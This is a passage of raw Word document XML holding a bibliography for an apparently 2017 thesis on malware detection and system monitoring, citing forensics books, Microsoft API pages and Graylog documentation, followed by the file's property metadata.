    <b:SourceType>Book</b:SourceType>
    <b:Guid>{1A7539F8-3CF5-491B-B13C-A66ED107A6E9}</b:Guid>
    <b:Title>The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory</b:Title>
    <b:Year>2014</b:Year>
    <b:Publisher>John Wiley &amp; Sons, Inc.</b:Publisher>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Ligh</b:Last>
            <b:First>Michael</b:First>
            <b:Middle>Hale</b:Middle>
          </b:Person>
          <b:Person>
            <b:Last>Case</b:Last>
            <b:First>Andrew</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Levy</b:Last>
            <b:First>Jamie</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Walters</b:Last>
            <b:First>AAron</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:City>United States of America</b:City>
    <b:RefOrder>9</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic3</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{4B14A17D-0E20-4C35-BDB4-109B4CF298BE}</b:Guid>
    <b:Title>The System Registry</b:Title>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Microsoft</b:Last>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>Microsoft Developer Network </b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft Coporation </b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/ms970651.aspx</b:URL>
    <b:RefOrder>10</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{97E1DF7C-6054-403B-A489-52752B29CEA0}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Processing Pipelines</b:Title>
    <b:InternetSiteTitle>Graylog Document</b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/pipelines/pipelines.html</b:URL>
    <b:RefOrder>16</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra1</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{37A879D6-4709-4721-987E-60B8DDD68F48}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Graylog Collector Sidecar</b:Title>
    <b:InternetSiteTitle>Graylog Document</b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc.</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/collector_sidecar.html</b:URL>
    <b:RefOrder>17</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra2</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{FAEC098F-B945-41A3-AD63-D95F3FDE9620}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Streams</b:Title>
    <b:InternetSiteTitle>Graylog Document </b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/streams.html</b:URL>
    <b:RefOrder>18</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Gra3</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{DE02AA5A-491D-4CE1-A65A-392699B410D3}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Graylog</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Alerts</b:Title>
    <b:InternetSiteTitle>Graylog Document</b:InternetSiteTitle>
    <b:ProductionCompany>Graylog, Inc.</b:ProductionCompany>
    <b:URL>http://docs.graylog.org/en/2.2/pages/streams/alerts.html</b:URL>
    <b:RefOrder>19</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Lin</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{A22852ED-8732-49C1-B476-A0095600533B}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Developer</b:Last>
            <b:First>Linux</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>INOTIFY</b:Title>
    <b:InternetSiteTitle>Linux Programmer's Manual</b:InternetSiteTitle>
    <b:URL>http://man7.org/linux/man-pages/man7/inotify.7.html</b:URL>
    <b:RefOrder>5</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Sik12</b:Tag>
    <b:SourceType>Book</b:SourceType>
    <b:Guid>{67462DCC-87C1-4AA8-8667-2DE5D8CB3B52}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Sikorski</b:Last>
            <b:First>Michael</b:First>
          </b:Person>
          <b:Person>
            <b:Last>Honig</b:Last>
            <b:First>Andrew</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software</b:Title>
    <b:Year>2012</b:Year>
    <b:StandardNumber>ISBN-10: 1-59327-290-1 / ISBN-13: 978-1-59327-290-6</b:StandardNumber>
    <b:City>San Francisco</b:City>
    <b:Publisher>William Pollock</b:Publisher>
    <b:RefOrder>20</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mar09</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{B3E6F094-9B22-415D-BDAF-66C45BA30CB6}</b:Guid>
    <b:Title>Pushing the Limits of Windows: Handles</b:Title>
    <b:Year>2009</b:Year>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Russinovich</b:Last>
            <b:First>Mark</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:InternetSiteTitle>Microsoft Technet</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft </b:ProductionCompany>
    <b:Month>September</b:Month>
    <b:Day>29</b:Day>
    <b:URL>https://blogs.technet.microsoft.com/markrussinovich/2009/09/29/pushing-the-limits-of-windows-handles/</b:URL>
    <b:RefOrder>21</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic4</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{9A6EF257-D4B8-45FC-AC2A-59FB4845EDC5}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Developer</b:Last>
            <b:First>Microsoft</b:First>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>NotifyServiceStatusChange function</b:Title>
    <b:InternetSiteTitle>Windows Developer Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms684276(v=vs.85).aspx</b:URL>
    <b:RefOrder>22</b:RefOrder>
  </b:Source>
  <b:Source>
    <b:Tag>Mic5</b:Tag>
    <b:SourceType>InternetSite</b:SourceType>
    <b:Guid>{87832D26-3FE8-48E2-A037-922ACC6905FE}</b:Guid>
    <b:Author>
      <b:Author>
        <b:NameList>
          <b:Person>
            <b:Last>Team</b:Last>
            <b:First>Microsoft</b:First>
            <b:Middle>Developer</b:Middle>
          </b:Person>
        </b:NameList>
      </b:Author>
    </b:Author>
    <b:Title>Asynchronous Procedure Calls</b:Title>
    <b:InternetSiteTitle>Microsoft Developer Center</b:InternetSiteTitle>
    <b:ProductionCompany>Microsoft</b:ProductionCompany>
    <b:URL>https://msdn.microsoft.com/en-us/library/windows/desktop/ms681951(v=vs.85).aspx</b:URL>
    <b:RefOrder>23</b:RefOrder>
  </b:Source>
</b:Sources>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{C31D7AAA-D561-4E5A-AF85-035B7E19C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4861</TotalTime>
  <Pages>119</Pages>
  <Words>24484</Words>
  <Characters>139562</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1163</Lines>
  <Paragraphs>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 Thien Hung</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Chau Thien Hung</cp:lastModifiedBy>
  <cp:revision>220</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-04-30T03:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-06-15T16:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>